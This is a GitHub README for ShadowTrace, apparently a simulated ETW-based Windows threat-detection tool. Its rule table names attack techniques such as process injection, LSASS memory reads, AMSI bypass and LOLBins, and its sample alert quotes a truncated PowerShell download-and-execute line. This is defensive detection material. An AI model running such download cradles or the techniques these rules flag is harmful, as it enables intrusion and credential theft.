mazen91111/ShadowTrace

# 👁️ ShadowTrace — ETW 实时威胁检测系统 ``` ╔════════════════════════════════════════════════════════════════╗ ║ ShadowTrace — ETW Real-Time Threat Detection ║ ║ Process · DNS · PowerShell · AMSI · LOLBins · Credentials ║ ║ Author: mazen91111 (parasite911) · Blue/Red Team ║ ╚════════════════════════════════════════════════════════════════╝ ``` ## 🎯 检测规则 (映射 MITRE ATT&CK) | Rule | MITRE ID | Severity | Description | |---|---|---|---| | 远程线程注入 | T1055.003 | 🔴 严重 | 外部进程中的 CreateRemoteThread | | 进程镂空 | T1055.012 | 🔴 严重 | NtUnmapViewOfSection + WriteProcessMemory | | APC 队列注入 | T1055.004 | 🟠 高 | 针对远程线程的 QueueUserAPC | | LSASS 内存访问 | T1003.001 | 🔴 严重 | 读取 lsass.exe 内存的进程 | | SAM 配置单元访问 | T1003.002 | 🟠 高 | 直接访问 SAM/SECURITY 注册表 | | LOLBin 执行 | T1218 | 🟠 高 | mshta, certutil, rundll32 等 | | 编码 PowerShell | T1059.001 | 🟠 高 | -EncodedCommand, IEX, DownloadString | | AMSI 绕过 | T1562.001 | 🔴 严重 | AmsiScanBuffer 补丁尝试 | | 注册表持久化 | T1547.001 | 🟡 中 | Run 键修改 | | 计划任务 | T1053.005 | 🟡 中 | schtasks /create 用于持久化 | | DNS 渗透 | T1048.003 | 🟠 高 | 高熵/长 DNS 子域名 | ## 📡 监控的 ETW 提供程序 | Provider | Events | |---|---| | Kernel-Process | ProcessStart, ProcessStop, ImageLoad | | Kernel-File | FileCreate, FileDelete | | DNS-Client | DNSQuery, DNSResponse | | PowerShell | ScriptBlockLog, CommandInvocation | | AMSI | AMSIScan, AMSIResult | | Security-Auditing | Logon, PrivilegeUse | | Sysmon | ProcessCreate, NetworkConnect, RegistryEvent | ## 🚀 安装 ``` git clone https://github.com/mazen91111/ShadowTrace.git cd ShadowTrace pip install -r requirements.txt ``` ## 🧪 使用方法 ``` # 开始实时威胁监控 (模拟) python shadowtrace.py --monitor # 列出所有带有 MITRE ID 的检测规则 python shadowtrace.py --list-rules # 列出 ETW provider 和 GUID python shadowtrace.py --list-providers # 监控 30 秒 python shadowtrace.py --monitor --duration 30 ``` ## 📸 示例输出 ``` ══════════════════════════════════════════════════════════════════════════ 👁️ ShadowTrace — Real-Time Threat Monitor ══════════════════════════════════════════════════════════════════════════ [ LIVE EVENT STREAM ] ────────────────────────────────────────────────────────────────────── ▐ 14:23:05.12 [CRITICAL] ▐ ⚠ Process Injection — Remote Thread Creation ▐ MITRE: T1055.003 │ PID: 892 │ svchost.exe ▐ SourcePID: 4812 → TargetPID: 892 (CreateRemoteThread) ▐ Matched: CreateRemoteThread ────────────────────────────────────────────────────────────────────── ▐ 14:23:05.55 [HIGH] ▐ ⚠ Suspicious PowerShell — Encoded Command ▐ MITRE: T1059.001 │ PID: 4812 │ powershell.exe ▐ ScriptBlock: IEX (New-Object Net.WebClient).DownloadString(...) ▐ Matched: IEX, Net.WebClient, DownloadString ────────────────────────────────────────────────────────────────────── ══════════════════════════════════════════════════════════════════════════ 👁️ ShadowTrace — Threat Detection Summary ══════════════════════════════════════════════════════════════════════════ Events Analyzed : 10 Alerts Triggered : 8 [ SEVERITY BREAKDOWN ] CRITICAL [█████████░░░░░░░░░░░░░░░░░░░░░] 3 HIGH [████████████░░░░░░░░░░░░░░░░░░] 4 MEDIUM [███░░░░░░░░░░░░░░░░░░░░░░░░░░░] 1 [ MITRE ATT&CK COVERAGE ] T1003.001 ● (1 alert) T1055.003 ● (1 alert) T1059.001 ●● (2 alerts) T1218 ●● (2 alerts) T1562.001 ● (1 alert) ``` ## 👤 作者 **Mazen Obed** — [@mazen91111](https://github.com/mazen91111) *威胁检测 | Windows 内部机制 | 蓝队与红队* ## ⚠️ 免责声明 ## 📄 许可证 MIT 许可证

标签：AMSI绕过, AMSI绕过, Cloudflare, Conpot, DNS泄露, EDR, ETW, LOLBins, LSASS, MITRE ATT&CK, PowerShell监控, SSH蜜罐, Windows安全, 事件跟踪, 威胁检测, 威胁检测, 数据展示, 知识库安全, 私有化部署, 红队, 网络安全, 脆弱性评估, 进程注入, 逆向工具, 防御规避, 隐私保护